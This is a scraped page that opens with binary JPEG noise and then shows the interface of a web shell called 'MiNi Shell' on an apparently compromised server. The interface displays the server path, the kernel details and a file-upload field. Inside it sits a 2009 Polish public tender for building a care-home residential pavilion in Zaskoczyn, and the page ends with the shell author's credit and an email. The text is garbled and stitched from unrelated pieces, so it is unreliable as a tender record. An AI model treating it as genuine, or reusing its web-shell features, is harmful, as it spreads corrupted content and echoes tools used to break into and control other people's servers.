JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090331/84422-N-2009.html

<p class="kh_header"><b>Pruszcz Gdański: Budowa pawilonu mieszkalnego dla osób upośledzonych umysłowo w Domu Pomocy Społecznej Leśny w Zaskoczynie</b><br>
<b>Numer ogłoszenia: 84422 - 2009; data zamieszczenia: 31.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa pawilonu mieszkalnego dla osób upośledzonych umysłowo w Domu Pomocy Społecznej Leśny w Zaskoczynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa pawilonu mieszkalnego dla osób upośledzonych umysłowo w Domu Pomocy Społecznej Leśny w Zaskoczynie
Budynek parterowy, niepodpiwniczony, dach dwuspadowy, budynek w kształcie litery L z wyjściem na taras. W budynku przewidziano pokoje jedno, dwu, trzy oraz czteroosobowe dla 57 osób mieszkających na stałe. Dodatkowo przewidziano duży hall stanowiący także jadalnię, salę TV, siłownię, salę zajęć plastycznych, pomieszczenia pomocnicze, kuchnię oraz dodatkowe pomieszczenia stanowiące całość funkcjonalną. 
Przed rozpoczęciem prac związanych z budową pawilonu należy wykonać prace przygotowawcze w zakresie :
- niwelacji terenu
- przełożeniem kolektora sanitarnego
- przełożeniem linii energetycznej zasilającej oczyszczalnię ścieków
- przełożenia instalacji hydrantowej zewnętrznej
UWAGA:
budynek oznaczony na planie zagospodarowania terenu (rys A-01) jako budynek do rozbiórki, został przez Zamawiającego rozebrany i zakres tych prac nie wchodzi do oferty.
Budynek należy wyposażyć w instalacje wewnętrzne, tj:.
a)Instalacje sanitarne:
- instalacja wodno-kanalizacyjna z instalacją wody ciepłej z istniejącej kotłowni zlokalizowanej w budynku głównym
-  instalacja co. (ogrzewanie olejowe z istniejącej kotłowni jw.)
- instalacja odwodnienia dachów
- wentylacja mechaniczna.
b) Instalacje elektryczne:
- instalacja elektryczna 230 V
- instalacja elektryczna 380 V
- instalacja niskonapięciowa 12 V
- instalacja RTV
- instalacja telefoniczna
- instalacja odgromowa
- instalacja p. poż.
- instalacja przyzywowa
- instalacja internetowa
Całość prac wykonać należy zgodnie z dokumentacją projektową opracowaną przez EPOCA-  PRACOWNIA PROJEKTOWA Krzysztof Galewski
Al. Ks. Waląga 1/2B 83-000 Pruszcz Gdańsk  oraz zgodnie z warunkami Pozwolenia na budowę nr  54/2009 (załączniki nr 11 do SIWZ)
2.Podział przedmiotu zamówienia na etapy.
I- szy etap 
- prace  budowlane: roboty ziemne, fundamenty, ściany, konstrukcja dachu, posadzki, stolarka okienna, drzwi zewnętrzne i pokrycie dachu wraz z obróbkami blacharskimi,
- prace elektryczne: linie kablowe, instalacja elektryczna wewnętrzna, wykonanie instalacji odgromowej, okablowania instalacji ppoż., przyzywowej, RTV, telefonicznej i internetowej,
- instalacje sanitarne: sieci i przyłącza, centralne ogrzewanie, kanalizacja i instalacja wodociągowa - bez białego montażu, 
- wentylacja i klimatyzacja: rozprowadzenie instalacji z montażem wentylatorów dachowych.
- termin realizacji etapu I  do:  30 listopada 2009 r., 
II- gi etap 
- prace budowlane:  wykonanie ścianek, tynków i okładzin, posadzki, stolarka drzwiowa wewnętrzna, prace malarskie, elewacyjne, wykonanie tarasu,
- prace elektryczne: wykonanie drugiej części instalacji ppoż., przyzywowej, RTV, telefonicznej i internetowej wraz z wykonaniem pomiarów instalacji,
- instalacje sanitarne:  centralne ogrzewanie, kanalizacja, instalacja wodociągowa - biały montaż, 
- wentylacja i klimatyzacja:  montaż anemostatów, centrali nawiewno - wyciągowej.
- termin realizacji zamówienia do: 15 sierpnia 2010 r.
4. Szczegółowy opis przedmiotu zamówienia zawarty jest w:
- dokumentacji projektowej - zał. nr 7 do siwz
- specyfikacjach technicznych wykonania i odbioru robót budowlanych - zał. nr 7 do siwz
- harmonogramie robót dla budowy pawilonu mieszkalnego - zał. nr 8 do siwz.
- wykaz robót dla I etapu z wyszczególnieniem prac branżowych wyłączonych z tego etapu (wykonanie tych prac przewidziano w etapie II -załącznik nr 9 do siwz).
5.Zamawiający  dopuszcza zatrudnienie podwykonawcy/podwykonawców.
6.W przypadku zatrudnienia podwykonawcy/podwykonawców, w oparciu o art. 36 ust. 4 Ustawy Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. Do oferty należy załączyć informację na ten temat (wzór zał. nr 11 do siwz). 
7.Umowa pomiędzy Wykonawcą i podwykonawcą/podwykonawcami musi być dostarczona do Zamawiającego przed datą zawarcia umowy na realizację niniejszego zamówienia w celu jej akceptacji.
8.W przypadku zatrudnienia podwykonawcy umowa pomiędzy Wykonawcą i podwykonawcą /podwykonawcami musi określać:
-przedmiot i zakres robót podwykonawcy,
-wartość robót podwykonawcy,
-terminy płatności na rzecz podwykonawcy nie dłuższe niż 7 dni,
-wskazanie konta bankowego podwykonawcy,
-zapis, iż podwykonawca złoży oświadczenie o otrzymaniu należnego          wynagrodzenia od Wykonawcy (Wykonawca dostarczy oświadczenie Zamawiającemu),
-zapis, iż niedochowanie terminu płatności na rzecz podwykonawcy przez Wykonawcę i brak oświadczenia, o którym mowa powyżej skutkuje automatyczną cesją wynagrodzenia należnego Wykonawcy od Zamawiającego w wysokości odpowiadającej wynagrodzeniu podwykonawcy.
9.Kwestie dotyczące podwykonawców określa wzór umowy - zał. nr 5 do siwz.
10. Zamawiający dopuszcza rozwiązania równoważne opisywanym w specyfikacji technicznej wykonania i odbioru robót - w zakresie wskazanych norm/aprobat/specyfikacji technicznych/systemów odniesienia. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełnią wymagania określone przez Zamawiającego.
11. W trakcie prowadzenia robót należy przestrzegać przepisów BHP zawartych w Rozporządzeniu Ministra Infrastruktury z dnia 6 lutego 2003 roku (Dz. U. z 2003 roku, Nr 47 poz. 401) w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.21.52.10-2, 45.30.00.00-0, 45.33.00.00-9, 45.31.00.00-3, 45.31.21.00-8, 45.31.20.00-7, 45.31.43.20-0, 45.33.12.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 50.000,- zł (pięćdziesiąt tysięcy  złotych) najpóźniej w dniu składania ofert do godz. 11:30<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Nie podleganie wykluczeniu z postępowania o udzielenie niniejszego zamówienia na podstawie art. 24 ust. 1 i 2 Ustawy.
2.Spełnienie warunków określonych w art. 22 ust. 1 pkt 1-3 Ustawy tj.:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj.:
-  prowadzą działalność gospodarczą w zakresie robót budowlanych,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem         
   technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią   
   pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia: tj.:
- wykażą się wykonaniem w okresie ostatnich 5 lat robót  budowlanych a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, odpowiadających swym rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia ( z podaniem ich wartości oraz daty i miejsca wykonania) minimum 3 robót budowlanych o wartości nie mniejszej niż 500 000 zł każda, oraz załączą dokumenty potwierdzające należyte wykonanie tych robót.
-  oddelegują do wykonania przedmiotu zamówienia kierownika budowy posiadającego uprawnienia do kierowania robotami budowlanymi w specjalności budowlanej.
- oddelegują do wykonania przedmiotu zamówienia kierownika robót posiadającego uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci instalacyjnych i urządzeń elektrycznych i elektroenergetycznych,
- oddelegują do wykonania przedmiotu zamówienia osobę posiadającą aktualne uprawnienia do wykonania pomiarów instalacji elektrycznej.
- oddelegują do wykonania przedmiotu zamówienia kierownika robót posiadającego uprawnienia do kierowania robotami w specjalności roboty sanitarne.
- oddelegują do wykonania przedmiotu zamówienia osobę posiadającą uprawnienia do kierowania robotami w zakresie teleinformatyki i alarmów
- oddelegują do wykonania przedmiotu zamówienia osobę posiadającą uprawnienia w zakresie zabezpieczenia p.poż 
3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
Spełnianie warunków udziału w postępowaniu oceniane będzie na podstawie załączonych do oferty oświadczeń i dokumentów, o których mowa w pkt VIII.1 i w pkt VIII.6 i 7 siwz oraz oryginałów lub kopii poświadczonych za zgodność z oryginałem przez Wykonawcę dokumentów określonych w pkt VIII.2-5 i w pkt VIII.8 siwz. Zamawiający dokona oceny każdego z warunków na podstawie załączonych do oferty wymaganych dokumentów zgodnie z kryterium spełnia/ nie spełnia.  
Na potwierdzenie spełnienia warunku w zakresie doświadczenia - w przypadku wykazania się przez Wykonawców robotami będącymi robotami wielobranżowymi, w wykazie robót załączonym do oferty Wykonawcy winni dodatkowo wyszczególnić spośród wykazanych robót budowlanych, robotę budowlaną i jej wartość, tak aby potwierdzić spełnienie postawionego warunku dotyczącego doświadczenia (opisanego w pkt VII.2.2a siwz). 
Spełnienie warunków przez podmioty występujące wspólnie (np. tzw. konsorcja):
W celu potwierdzenia spełnienia warunków udziału w postępowaniu każdy z podmiotów występujących wspólnie winien załączyć do oferty oświadczenie, o którym mowa w pkt VIII.1 siwz oraz dokumenty, o których mowa w pkt VIII.2-5 siwz. W zakresie pozostałych dokumentów Wykonawcy występujący wspólnie winni wykazać się, iż łącznie spełniają te warunki poprzez złożenie dokumentów określonych w pkt VIII.6-9 siwz.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie Wykonawcy o nie podleganiu wykluczeniu z postępowania w oparciu o art. 24 ust. 1 i 2 Ustawy (wzór zał. nr 2 do siwz).
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.
4.Aktualna informacja z Krajowego Rejestru Karnego wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy.
5.Aktualna informacja z Krajowego Rejestru Karnego wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy.
6.Dowód wniesienia wadium.
7.Wykaz wykonanych minimum 3 robót budowlanych o wartości nie mniejszej niż  500 000 zł każda, w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (wzór zał. nr 4 do siwz), z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie.
8.Wykaz osób posiadających przedstawione poniżej uprawnienia:
a)kierownika budowy do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej  wraz z aktualnym zaświadczeniem o przynależności do właściwej Izby Inżynierów. 
b)kierownika robót posiadającego uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci instalacyjnych i urządzeń elektrycznych i elektroenergetycznych, wraz z zaświadczeniem o przynależności do właściwej Izby Inżynierów,
c)osoby posiadającej aktualne uprawnienia do wykonywania pomiarów instalacji elektrycznej,
d)kierownika robót posiadającego uprawnienia do kierowania robotami w specjalności instalacji sanitarnych.
e)osoby do kierowania robotami w zakresie instalacji teleinformatycznej i systemów alarmowych 
f)osoby do kierowania  robotami w zakresie systemów zabezpieczeń p. poż.
9.Umowa konsorcjum dostarczona po wyborze najkorzystniejszej oferty (o ile dotyczy)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 122. Specyfikacja odpłatna 130zł - ewentualne koszty przesyłki 13,40 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2009 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. nr 101.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com